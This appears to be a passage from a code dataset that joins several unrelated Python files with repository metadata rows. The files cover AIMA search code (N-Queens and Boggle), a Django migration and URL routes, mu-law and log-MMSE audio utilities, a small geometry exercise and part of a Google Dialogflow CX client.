            return int(distance(locs[node.state], locs[self.goal]))
        else:
            # No coordinates available: heuristic is unusable.
            return infinity
# ______________________________________________________________________________
#### NOTE: NQueensProblem not working properly yet.
class NQueensProblem(Problem):
    """The problem of placing N queens on an NxN board with none attacking
    each other.  A state is represented as an N-element array, where a
    value of r in the c-th entry means there is a queen at column c,
    row r, and a value of None means that the c-th column has not been
    filled in yet.  We fill in columns left to right."""

    def __init__(self, N):
        self.N = N
        self.initial = [None] * N

    def successor(self, state):
        "In the leftmost empty column, try all non-conflicting rows."
        if state[-1] is not None:
            return []  # All columns filled; no successors

        def place(col, row):
            # Copy of state with a queen placed at (row, col).
            new = state[:]
            new[col] = row
            return new

        col = state.index(None)
        return [(row, place(col, row)) for row in range(self.N)
                if not self.conflicted(state, row, col)]

    def conflicted(self, state, row, col):
        "Would placing a queen at (row, col) conflict with anything?"
        # BUG FIX: was range(col - 1), which skipped the immediately
        # preceding column, so attacks from the adjacent queen went
        # undetected (the cause of the "not working properly" note).
        for c in range(col):
            if self.conflict(row, col, state[c], c):
                return True
        return False

    def conflict(self, row1, col1, row2, col2):
        "Would putting two queens in (row1, col1) and (row2, col2) conflict?"
        return (row1 == row2  ## same row
                or col1 == col2  ## same column
                or row1 - col1 == row2 - col2  ## same \ diagonal
                or row1 + col1 == row2 + col2)  ## same / diagonal

    def goal_test(self, state):
        "Check if all columns filled, no conflicts."
        if state[-1] is None:
            return False
        for c in range(len(state)):
            if self.conflicted(state, state[c], c):
                return False
        return True
# ______________________________________________________________________________
## Inverse Boggle: Search for a high-scoring Boggle board. A good domain for
## iterative-repair and related search tehniques, as suggested by Justin Boyan.
# Uppercase letters; used to index Wordlist.bounds.
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# The 16 letter cubes of a standard 4x4 Boggle set; one face is chosen at
# random from each cube when a board is rolled (see random_boggle).
cubes16 = ['FORIXB', 'MOQABJ', 'GURILW', 'SETUPL',
           'CMPDAE', 'ACITAO', 'SLCRAE', 'ROMASH',
           'NODESW', 'HEFIYE', 'ONUDTK', 'TEVIGN',
           'ANEDVZ', 'PINESH', 'ABILYT', 'GKYLEU']
def random_boggle(n=4):
    """Return a random Boggle board of size n x n.
    A board is represented as a flat (row-major) list of letters."""
    # Reuse the 16 standard cubes cyclically when the board needs more.
    cubes = [cubes16[i % 16] for i in range(n * n)]
    random.shuffle(cubes)
    # One random face per cube.
    return [random.choice(cube) for cube in cubes]
## The best 5x5 board found by Boyan; with our word list this board scores
## 2274 words, for a score of 9837.
boyan_best = list('RSTCSDEIAEGNLRPEATESMSSID')
def print_boggle(board):
    """Print the board in a 2-d array.

    BUG FIX: the original body was a garbled Python 2 print statement
    (`print 'Qu',` / `print str(board[i]) + ' ',` had been split across
    lines, leaving a SyntaxError).  Reconstructed with sys.stdout.write so
    it reproduces the intended row-per-line, space-separated layout
    portably."""
    n2 = len(board)
    n = exact_sqrt(n2)
    for i in range(n2):
        if i % n == 0:
            sys.stdout.write('\n')  # start a new row
        if board[i] == 'Q':
            sys.stdout.write('Qu ')  # a Q cube face stands for 'Qu'
        else:
            sys.stdout.write(str(board[i]) + '  ')
    sys.stdout.write('\n')
def boggle_neighbors(n2, cache={}):
    """Return a list of lists, where the i-th element is the list of indexes
    for the neighbors of square i on an n x n board (n2 = n*n).
    Results are memoized in `cache` (the shared default dict is deliberate)."""
    if n2 in cache:
        return cache[n2]
    n = exact_sqrt(n2)
    neighbors = [None] * n2
    for i in range(n2):
        adjacent = []
        neighbors[i] = adjacent
        row, col = divmod(i, n)
        on_top = row == 0
        on_bottom = row == n - 1
        on_left = col == 0
        on_right = col == n - 1
        if not on_top:
            adjacent.append(i - n)
            if not on_left: adjacent.append(i - n - 1)
            if not on_right: adjacent.append(i - n + 1)
        if not on_bottom:
            adjacent.append(i + n)
            if not on_left: adjacent.append(i + n - 1)
            if not on_right: adjacent.append(i + n + 1)
        if not on_left: adjacent.append(i - 1)
        if not on_right: adjacent.append(i + 1)
    cache[n2] = neighbors
    return neighbors
def exact_sqrt(n2):
    "If n2 is a perfect square, return its square root, else raise error."
    root = int(math.sqrt(n2))
    assert root * root == n2
    return root
##_____________________________________________________________________________
class Wordlist:
    """This class holds a list of words. You can use (word in wordlist)
    to check if a word is in the list, or wordlist.lookup(prefix)
    to see if prefix starts any of the words in the list."""

    def __init__(self, filename, min_len=3):
        # BUG FIX: close the file deterministically (the original leaked
        # the open handle).
        with open(filename) as f:
            lines = f.read().upper().split()
        self.words = [word for word in lines if len(word) >= min_len]
        self.words.sort()
        # bounds[c] = (lo, hi) slice of self.words whose entries start
        # with letter c; used to narrow binary searches.
        self.bounds = {}
        for c in ALPHABET:
            c2 = chr(ord(c) + 1)
            self.bounds[c] = (bisect.bisect(self.words, c),
                              bisect.bisect(self.words, c2))

    def lookup(self, prefix, lo=0, hi=None):
        """See if prefix is in dictionary, as a full word or as a prefix.
        Return two values: the first is the lowest i such that
        words[i].startswith(prefix), or is None; the second is
        True iff prefix itself is in the Wordlist."""
        words = self.words
        i = bisect.bisect_left(words, prefix, lo, hi)
        if i < len(words) and words[i].startswith(prefix):
            return i, (words[i] == prefix)
        else:
            return None, False

    def __contains__(self, word):
        # BUG FIX: bisect_left may return len(self.words) (word sorts after
        # every entry); the original then raised IndexError instead of
        # returning False.
        i = bisect.bisect_left(self.words, word)
        return i < len(self.words) and self.words[i] == word

    def __len__(self):
        return len(self.words)
##_____________________________________________________________________________
class BoggleFinder:
    """A class that allows you to find all the words in a Boggle board. """

    # Class-level word list, loaded lazily on first instantiation and
    # shared by every finder.
    wordlist = None  ## A class variable, holding a wordlist

    def __init__(self, board=None):
        if BoggleFinder.wordlist is None:
            # NOTE(review): path is relative to the working directory --
            # confirm callers run from the expected location.
            BoggleFinder.wordlist = Wordlist("../data/wordlist")
        # Maps each found word -> True (a set substitute).
        self.found = {}
        if board:
            self.set_board(board)

    def set_board(self, board=None):
        "Set the board, and find all the words in it."
        if board is None:
            board = random_boggle()
        self.board = board
        self.neighbors = boggle_neighbors(len(board))
        self.found = {}
        # Start a depth-first word search from every square, restricted to
        # the word-list slice beginning with that square's letter.
        for i in range(len(board)):
            lo, hi = self.wordlist.bounds[board[i]]
            self.find(lo, hi, i, [], '')
        return self

    def find(self, lo, hi, i, visited, prefix):
        """Looking in square i, find the words that continue the prefix,
        considering the entries in self.wordlist.words[lo:hi], and not
        revisiting the squares in visited."""
        if i in visited:
            return
        wordpos, is_word = self.wordlist.lookup(prefix, lo, hi)
        if wordpos is not None:
            if is_word:
                self.found[prefix] = True
            # Extend the path through this square and recurse into its
            # neighbors, then backtrack (visited.pop()).
            visited.append(i)
            c = self.board[i]
            if c == 'Q': c = 'QU'  # the Q cube face counts as 'Qu'
            prefix += c
            for j in self.neighbors[i]:
                self.find(wordpos, hi, j, visited, prefix)
            visited.pop()

    def words(self):
        "The words found."
        return self.found.keys()

    # Boggle scoring by word length: 3-4 letters = 1, 5 = 2, 6 = 3,
    # 7 = 5, 8+ = 11 points.
    scores = [0, 0, 0, 0, 1, 2, 3, 5] + [11] * 100

    def score(self):
        "The total score for the words found, according to the rules."
        return sum([self.scores[len(w)] for w in self.words()])

    def __len__(self):
        "The number of words found."
        return len(self.found)
##_____________________________________________________________________________
def boggle_hill_climbing(board=None, ntimes=100, print_it=True):
    """Solve inverse Boggle by hill-climbing: find a high-scoring board by
    starting with a random one and repeatedly mutating one square, keeping
    a mutation only when it increases the number of findable words.

    Returns (board, best) where best is the word count of the final board.
    """
    finder = BoggleFinder()
    if board is None:
        board = random_boggle()
    best = len(finder.set_board(board))
    for _ in range(ntimes):
        i, oldc = mutate_boggle(board)
        new = len(finder.set_board(board))
        if new > best:
            best = new
            # Report each improvement.  (The original left a mangled
            # Python 2 print statement here as two no-op expression lines.)
            print(best, _, board)
        else:
            board[i] = oldc ## Change back
    if print_it:
        print_boggle(board)
    return board, best
def mutate_boggle(board):
    """Overwrite one random square of *board* with a letter drawn from a
    random cube; return (index, previous_letter) so the caller can undo."""
    pos = random.randrange(len(board))
    previous = board[pos]
    cube = random.choice(cubes16)
    board[pos] = random.choice(cube)
    return pos, previous
# ______________________________________________________________________________
## Code to compare searchers on various problems.
class InstrumentedProblem(Problem):
    """Wraps a problem and counts how often its methods are called."""
    def __init__(self, problem):
        self.problem = problem
        self.succs = 0       # number of successor() calls
        self.goal_tests = 0  # number of goal_test() calls
        self.states = 0      # total number of successor states generated
        self.found = None    # the goal state, once one passes goal_test
    def successor(self, state):
        "Return a list of (action, state) pairs reachable from this state."
        pairs = self.problem.successor(state)
        self.succs += 1
        self.states += len(pairs)
        return pairs
    def goal_test(self, state):
        "Return true if the state is a goal."
        self.goal_tests += 1
        is_goal = self.problem.goal_test(state)
        if is_goal:
            self.found = state
        return is_goal
    def __getattr__(self, attr):
        # Serve our own counters from the instance dict; delegate every
        # other attribute to the wrapped problem.
        if attr in ('succs', 'goal_tests', 'states'):
            return self.__dict__[attr]
        return getattr(self.problem, attr)
    def __repr__(self):
        return '<%4d/%4d/%4d/%s>' % (
            self.succs, self.goal_tests, self.states, str(self.found)[0:4])
def compare_searchers(problems, header, searchers=[breadth_first_tree_search,
                      breadth_first_graph_search, depth_first_graph_search,
                      iterative_deepening_search, depth_limited_search,
                      astar_search]):
    """Run each searcher on each problem and print a table of statistics."""
    def run_one(searcher, problem):
        # Instrument the problem so the calls made by the searcher are counted.
        instrumented = InstrumentedProblem(problem)
        searcher(instrumented)
        return instrumented
    rows = []
    for s in searchers:
        rows.append([name(s)] + [run_one(s, p) for p in problems])
    print_table(rows, header)
def compare_graph_searchers():
    """Benchmark the default searchers on three sample route-finding problems."""
    problems = [GraphProblem('A', 'B', romania),
                GraphProblem('O', 'N', romania),
                GraphProblem('Q', 'WA', australia)]
    header = ['Searcher', 'Romania(A,B)', 'Romania(O, N)', 'Australia']
    compare_searchers(problems=problems, header=header)
| [
"[email protected]"
] | |
0b1cde1c5f80af4837b8282ef80c77174dc1c5e7 | 12f18662719d04d2404396b9059b60525528f557 | /findsportsordermanagement-master/purchaseorder/migrations/0018_purchaseorder_internal_notes.py | 45c5291a9d14c87910376425849d88f1c857c904 | [] | no_license | ujjalgoswami/ordermanagementcustomdashboard | 0bf4a5770d1913b257a43858d778e630e671a342 | acd18510b0934601d30bd717ea4b3fbb61ecfb5c | refs/heads/master | 2021-02-04T10:04:27.380674 | 2020-02-28T01:37:35 | 2020-02-28T01:37:35 | 243,653,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | # Generated by Django 2.2.4 on 2019-12-10 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the free-form ``internal_notes`` text column to PurchaseOrder.

    # Must be applied after the migration that introduced Orderline.reorder.
    dependencies = [
        ('purchaseorder', '0017_orderline_reorder'),
    ]

    operations = [
        migrations.AddField(
            model_name='purchaseorder',
            name='internal_notes',
            # null=True: existing rows get NULL instead of requiring a default.
            field=models.TextField(null=True),
        ),
    ]
| [
"[email protected]"
] | |
667a27f91a5feffa45b0df3b9f4c79d54a94be94 | af93b3909f86ab2d310a8fa81c9357d87fdd8a64 | /begginer/5. cas/zadatak5.py | f27bd47d532b65caf07d06877073feb078f9bbcb | [] | no_license | BiljanaPavlovic/pajton-kurs | 8cf15d443c9cca38f627e44d764106ef0cc5cd98 | 93092e6e945b33116ca65796570462edccfcbcb0 | refs/heads/master | 2021-05-24T14:09:57.536994 | 2020-08-02T15:00:12 | 2020-08-02T15:00:12 | 253,597,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | unos=input("Unesite stranice a i b:")
stranice=unos.split(" ")
obim=2*float(stranice[0])+2*float(stranice[1])
povrsina=float(stranice[0])*float(stranice[1])
print("O= ",obim)
print("P=",povrsina)
| [
"[email protected]"
] | |
99e4e4ca7bb40a4fc37e65d4d6c65b0a7d078685 | b9d75e3e37d08262321b0dc726639fc25f152caa | /utils.py | cc49eb7b6a45ee027cefe48ead6e43e9a20dab51 | [] | no_license | G-Wang/pytorch_FFTNet | a2712763ae7ee2fff9d002c931593987d6e25060 | b96486f6823e762e71c2e299739b925081e5bacf | refs/heads/master | 2020-04-08T22:14:18.563719 | 2018-08-31T07:38:21 | 2018-08-31T07:38:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,463 | py | import numpy as np
import torch
from torch.nn import functional as F
from scipy.special import expn
from torchaudio.transforms import MuLawEncoding, MuLawExpanding
def encoder(quantization_channels):
    """Return a torchaudio mu-law encoding transform with the given number of levels."""
    transform = MuLawEncoding(quantization_channels)
    return transform
def decoder(quantization_channels):
    """Return a torchaudio mu-law expanding (decoding) transform with the given number of levels."""
    transform = MuLawExpanding(quantization_channels)
    return transform
def np_mulaw(x, quantization_channels):
    """Apply mu-law companding to *x* (expected in [-1, 1]) using numpy."""
    mu = quantization_channels - 1
    magnitude = np.log1p(mu * np.abs(x)) / np.log1p(mu)
    return np.sign(x) * magnitude
def np_inv_mulaw(x, quantization_channels):
    """Invert mu-law companding; maps companded values in [-1, 1] back to linear."""
    mu = quantization_channels - 1
    magnitude = (np.exp(np.abs(x) * np.log1p(mu)) - 1.) / mu
    return np.sign(x) * magnitude
def float2class(x, classes):
    """Quantize *x* in [-1, 1] to integer class labels in 0..classes-1."""
    top = classes - 1
    scaled = (x + 1) / 2 * top
    return np.rint(scaled).astype(int)
def class2float(x, classes):
    """Map integer class labels 0..classes-1 back to floats in [-1, 1]."""
    top = classes - 1
    return x.astype(float) / top * 2 - 1.
def zero_padding(x, maxlen, dim=0):
    """Zero-pad array *x* at the end of axis *dim* so that axis reaches
    length *maxlen*; return *x* unchanged if it is already long enough."""
    deficit = maxlen - x.shape[dim]
    if deficit <= 0:
        return x
    pad_widths = [(0, deficit) if axis == dim else (0, 0)
                  for axis in range(x.ndim)]
    return np.pad(x, pad_widths, 'constant')
def repeat_last_padding(x, maxlen):
    """Pad *x* along its last axis to length *maxlen* by repeating the final
    element; return *x* unchanged if it is already long enough."""
    deficit = maxlen - x.shape[-1]
    if deficit <= 0:
        return x
    tail = np.repeat(x[..., -1:], deficit, axis=-1)
    return np.concatenate((x, tail), axis=-1)
# this function is copied from https://github.com/braindead/logmmse/blob/master/logmmse.py
# change numpy to tensor
def logmmse(x, sr, noise_std=1 / 256):
    """Log-MMSE speech enhancement of waveform tensor *x* sampled at *sr*.

    The noise spectrum is estimated from synthetic Gaussian noise of
    std *noise_std* rather than from the signal itself.  Returns the
    overlap-added enhanced waveform (length may differ slightly from x).
    """
    # 20 ms analysis window, forced even so the FFT padding splits evenly.
    window_size = int(0.02 * sr)
    if window_size % 2 == 1:
        window_size += 1
    # noverlap = len1; hop_size = len2; window_size = len
    noverlap = int(window_size * 0.75)
    hop_size = window_size - noverlap
    win = torch.hann_window(window_size)
    # Scale the window so overlap-add reconstruction preserves amplitude.
    win *= hop_size / win.sum()
    # FFT size: next power of two >= window_size; window is centered in it.
    nfft = 2 ** (window_size - 1).bit_length()
    pad_pos = (nfft - window_size) // 2
    # Estimate the noise magnitude spectrum from 6 synthetic noise frames.
    noise = torch.randn(6, window_size) * noise_std
    noise_fft = torch.rfft(F.pad(win * noise, (pad_pos, pad_pos)), 1)
    noise_mean = noise_fft.pow(2).sum(-1).sqrt()
    noise_mu = noise_mean.mean(0)
    noise_mu2 = noise_mu.pow(2)
    spec = torch.stft(x, nfft, hop_length=hop_size, win_length=window_size, window=win, center=False)
    spec_copy = spec.clone()
    sig2 = spec.pow(2).sum(-1)
    # Per-frame voice-activity decision used to blend enhanced/original audio.
    vad_curve = vad(x, S=spec).float()
    # aa: decision-directed smoothing factor; ksi_min: a-priori SNR floor (-25 dB).
    aa = 0.98
    ksi_min = 10 ** (-25 / 10)
    # gammak: a-posteriori SNR, clamped at 40 to avoid numeric blow-up.
    gammak = torch.min(sig2 / noise_mu2.unsqueeze(-1), torch.Tensor([40]))
    for n in range(spec.size(1)):
        gammak_n = gammak[:, n]
        if n == 0:
            ksi = aa + (1 - aa) * F.relu(gammak_n - 1)
        else:
            # Decision-directed estimate: blend previous enhanced frame's SNR
            # with the current instantaneous SNR, floored at ksi_min.
            ksi = aa * spec_copy[:, n - 1].pow(2).sum(-1) / noise_mu2 + (1 - aa) * F.relu(gammak_n - 1)
            ksi = torch.max(ksi, torch.Tensor([ksi_min]))
        A = ksi / (1 + ksi)
        vk = A * gammak_n
        # Log-MMSE gain: A * exp(0.5 * E1(vk)).
        ei_vk = 0.5 * expint(vk)
        hw = A * ei_vk.exp()
        spec_copy[:, n] *= hw.unsqueeze(-1)
    # Back to time domain; drop the FFT centering pad from each frame.
    xi_w = torch.irfft(spec_copy.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
    origin = torch.irfft(spec.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
    # Voiced frames use mostly the enhanced signal, unvoiced frames a
    # half/half mix (masks sum to 1 per frame).
    xi_w_mask = vad_curve / 2 + 0.5
    orign_mask = (1 - vad_curve) / 2
    final_framed = xi_w * xi_w_mask.unsqueeze(-1) + origin * orign_mask.unsqueeze(-1)
    # Overlap-add the frames back into one waveform.
    xfinal = torch.zeros(final_framed.size(0) * hop_size + noverlap)
    k = 0
    for n in range(final_framed.size(0)):
        xfinal[k:k + window_size] += final_framed[n]
        k += hop_size
    return xfinal
def expint(x):
    """Element-wise exponential integral E1 of tensor *x*, computed via scipy."""
    values = expn(1, x.detach().cpu().numpy())
    return torch.from_numpy(values).float()
def vad(x, hop_size=256, S=None, k=5, med_num=9):
    """Frame-level energy-based voice activity detection.

    Returns a per-frame boolean tensor (True = active).  The energy
    threshold is derived automatically from the quietest frames: the
    sorted energy curve's first derivative peak separates "noise floor"
    frames from the rest, and the threshold is k times their mean.
    The decision is median-filtered over med_num frames.
    """
    if S is None:
        S = torch.stft(x, hop_size * 4, hop_length=hop_size)
    # Per-frame RMS magnitude, normalized to max 1.
    energy = S.pow(2).sum(-1).mean(0).sqrt()
    energy /= energy.max()
    # Central difference of the sorted energy curve, smoothed with a
    # 15-tap moving average.
    sorted_E, _ = energy.sort()
    sorted_E_d = sorted_E[2:] - sorted_E[:-2]
    smoothed = F.pad(sorted_E_d, (7, 7)).unfold(0, 15, 1).mean(-1)
    # Nonzero only at local maxima of the smoothed derivative.
    sorted_E_d_peak = F.relu(smoothed[1:-1] - smoothed[:-2]) * F.relu(smoothed[1:-1] - smoothed[2:])
    # First derivative peak marks the end of the noise-floor frames
    # (+2 compensates the differencing offset).
    first, *dummy = torch.nonzero(sorted_E_d_peak) + 2
    E_th = sorted_E[:first].mean() * k
    decision = torch.gt(energy, E_th)
    # Median filter the boolean decision to remove isolated flips.
    pad = (med_num // 2, med_num // 2)
    decision = F.pad(decision, pad)
    decision = decision.unfold(0, med_num, 1)
    decision, _ = decision.median(dim=-1)
    return decision
| [
"[email protected]"
] | |
7943c82bfb5eef6a125f551f9bf92c8ed87f9028 | 7da0e8d03548ec83ec717a076add2199e543e3dd | /InvenTree/part/urls.py | 75d5041b9c89cb54a2d092a2a95eaf92b5418bb4 | [
"MIT"
] | permissive | Devarshi87/InvenTree | 7b90cbf14699861436ab127b9b7638cee81e30c4 | 2191b7f71972d4c3ba7322cc93936801a168ab3c | refs/heads/master | 2020-05-15T04:25:03.289794 | 2019-04-18T12:42:36 | 2019-04-18T12:42:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,522 | py | from django.conf.urls import url, include
from . import views
# URLs for a single supplier-part record (edit/delete/detail fallback).
supplier_part_detail_urls = [
    url(r'edit/?', views.SupplierPartEdit.as_view(), name='supplier-part-edit'),
    url(r'delete/?', views.SupplierPartDelete.as_view(), name='supplier-part-delete'),

    url('^.*$', views.SupplierPartDetail.as_view(), name='supplier-part-detail'),
]

# Supplier-part creation plus per-record sub-URLs keyed by primary key.
supplier_part_urls = [
    url(r'^new/?', views.SupplierPartCreate.as_view(), name='supplier-part-create'),

    url(r'^(?P<pk>\d+)/', include(supplier_part_detail_urls)),
]

# Tabs and actions available on a single part's detail page.
part_detail_urls = [
    url(r'^edit/?', views.PartEdit.as_view(), name='part-edit'),
    url(r'^delete/?', views.PartDelete.as_view(), name='part-delete'),
    url(r'^track/?', views.PartDetail.as_view(template_name='part/track.html'), name='part-track'),
    url(r'^bom-export/?', views.BomDownload.as_view(), name='bom-export'),
    url(r'^bom/?', views.PartDetail.as_view(template_name='part/bom.html'), name='part-bom'),
    url(r'^build/?', views.PartDetail.as_view(template_name='part/build.html'), name='part-build'),
    url(r'^stock/?', views.PartDetail.as_view(template_name='part/stock.html'), name='part-stock'),
    url(r'^used/?', views.PartDetail.as_view(template_name='part/used_in.html'), name='part-used-in'),
    url(r'^allocation/?', views.PartDetail.as_view(template_name='part/allocation.html'), name='part-allocation'),
    url(r'^suppliers/?', views.PartDetail.as_view(template_name='part/supplier.html'), name='part-suppliers'),

    url(r'^thumbnail/?', views.PartImage.as_view(), name='part-image'),

    # Any other URLs go to the part detail page
    url(r'^.*$', views.PartDetail.as_view(), name='part-detail'),
]

# Edit/delete/detail for a single part category.
part_category_urls = [
    url(r'^edit/?', views.CategoryEdit.as_view(), name='category-edit'),
    url(r'^delete/?', views.CategoryDelete.as_view(), name='category-delete'),

    url('^.*$', views.CategoryDetail.as_view(), name='category-detail'),
]

# Edit/delete/detail for a single BOM line item.
part_bom_urls = [
    url(r'^edit/?', views.BomItemEdit.as_view(), name='bom-item-edit'),
    url('^delete/?', views.BomItemDelete.as_view(), name='bom-item-delete'),

    url(r'^.*$', views.BomItemDetail.as_view(), name='bom-item-detail'),
]

# URL list for part web interface
part_urls = [

    # Create a new category
    url(r'^category/new/?', views.CategoryCreate.as_view(), name='category-create'),

    # Create a new part
    url(r'^new/?', views.PartCreate.as_view(), name='part-create'),

    # Create a new BOM item
    url(r'^bom/new/?', views.BomItemCreate.as_view(), name='bom-item-create'),

    # Individual part
    url(r'^(?P<pk>\d+)/', include(part_detail_urls)),

    # Part category
    url(r'^category/(?P<pk>\d+)/', include(part_category_urls)),

    url(r'^bom/(?P<pk>\d+)/', include(part_bom_urls)),

    # Top level part list (display top level parts and categories)
    url(r'^.*$', views.PartIndex.as_view(), name='part-index'),
]
"""
part_param_urls = [
# Detail of a single part parameter
url(r'^(?P<pk>[0-9]+)/?$', views.PartParamDetail.as_view(), name='partparameter-detail'),
# Parameters associated with a particular part
url(r'^\?.*/?$', views.PartParamList.as_view()),
url(r'^$', views.PartParamList.as_view()),
]
part_param_template_urls = [
# Detail of a single part field template
url(r'^(?P<pk>[0-9]+)/?$', views.PartTemplateDetail.as_view(), name='partparametertemplate-detail'),
# List all part field templates
url(r'^\?.*/?$', views.PartTemplateList.as_view()),
url(r'^$', views.PartTemplateList.as_view())
]
"""
| [
"[email protected]"
] | |
fce81db8d06a0acb025336f3230e94f6e442c914 | c7d3c8f2667b73e68878253a95d034fd7f1f0583 | /env/Lib/site-packages/google/cloud/dialogflowcx_v3beta1/services/transition_route_groups/client.py | ea13b5eb4ebc6271f1f9e44940f1da2f202aec95 | [] | no_license | jeevana28/ivrchatbot | e57e9b94b2b6c201e79d27036eca2e6c1f5deb56 | fe5d281ebf774f46861b8f8eaea0494baf115f67 | refs/heads/master | 2023-06-07T01:20:40.547119 | 2021-07-06T15:47:15 | 2021-07-06T15:47:15 | 361,155,397 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,168 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.dialogflowcx_v3beta1.services.transition_route_groups import pagers
from google.cloud.dialogflowcx_v3beta1.types import page
from google.cloud.dialogflowcx_v3beta1.types import transition_route_group
from google.cloud.dialogflowcx_v3beta1.types import (
transition_route_group as gcdc_transition_route_group,
)
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
from .transports.base import TransitionRouteGroupsTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import TransitionRouteGroupsGrpcTransport
from .transports.grpc_asyncio import TransitionRouteGroupsGrpcAsyncIOTransport
class TransitionRouteGroupsClientMeta(type):
    """Metaclass for the TransitionRouteGroups client.

    This provides class-level methods for building and retrieving
    support objects (e.g. transport) without polluting the client instance
    objects.
    """

    _transport_registry = (
        OrderedDict()
    )  # type: Dict[str, Type[TransitionRouteGroupsTransport]]
    _transport_registry["grpc"] = TransitionRouteGroupsGrpcTransport
    _transport_registry["grpc_asyncio"] = TransitionRouteGroupsGrpcAsyncIOTransport

    def get_transport_class(
        cls, label: str = None,
    ) -> Type[TransitionRouteGroupsTransport]:
        """Return the transport class registered under *label*, or the
        default (first-registered) transport when no label is given."""
        registry = cls._transport_registry
        if label:
            return registry[label]

        # No explicit label requested: fall back to the first entry.
        return next(iter(registry.values()))
class TransitionRouteGroupsClient(metaclass=TransitionRouteGroupsClientMeta):
"""Service for managing
[TransitionRouteGroups][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "dialogflow.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TransitionRouteGroupsClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TransitionRouteGroupsClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
    @property
    def transport(self) -> TransitionRouteGroupsTransport:
        """Return the transport used by the client instance.

        The transport is created lazily in ``__init__`` and shared for the
        lifetime of the client.

        Returns:
            TransitionRouteGroupsTransport: The transport used by the client instance.
        """
        return self._transport
@staticmethod
def flow_path(project: str, location: str, agent: str, flow: str,) -> str:
"""Return a fully-qualified flow string."""
return "projects/{project}/locations/{location}/agents/{agent}/flows/{flow}".format(
project=project, location=location, agent=agent, flow=flow,
)
@staticmethod
def parse_flow_path(path: str) -> Dict[str, str]:
"""Parse a flow path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/flows/(?P<flow>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def intent_path(project: str, location: str, agent: str, intent: str,) -> str:
"""Return a fully-qualified intent string."""
return "projects/{project}/locations/{location}/agents/{agent}/intents/{intent}".format(
project=project, location=location, agent=agent, intent=intent,
)
@staticmethod
def parse_intent_path(path: str) -> Dict[str, str]:
"""Parse a intent path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/intents/(?P<intent>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def page_path(
project: str, location: str, agent: str, flow: str, page: str,
) -> str:
"""Return a fully-qualified page string."""
return "projects/{project}/locations/{location}/agents/{agent}/flows/{flow}/pages/{page}".format(
project=project, location=location, agent=agent, flow=flow, page=page,
)
@staticmethod
def parse_page_path(path: str) -> Dict[str, str]:
"""Parse a page path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/flows/(?P<flow>.+?)/pages/(?P<page>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def transition_route_group_path(
project: str, location: str, agent: str, flow: str, transition_route_group: str,
) -> str:
"""Return a fully-qualified transition_route_group string."""
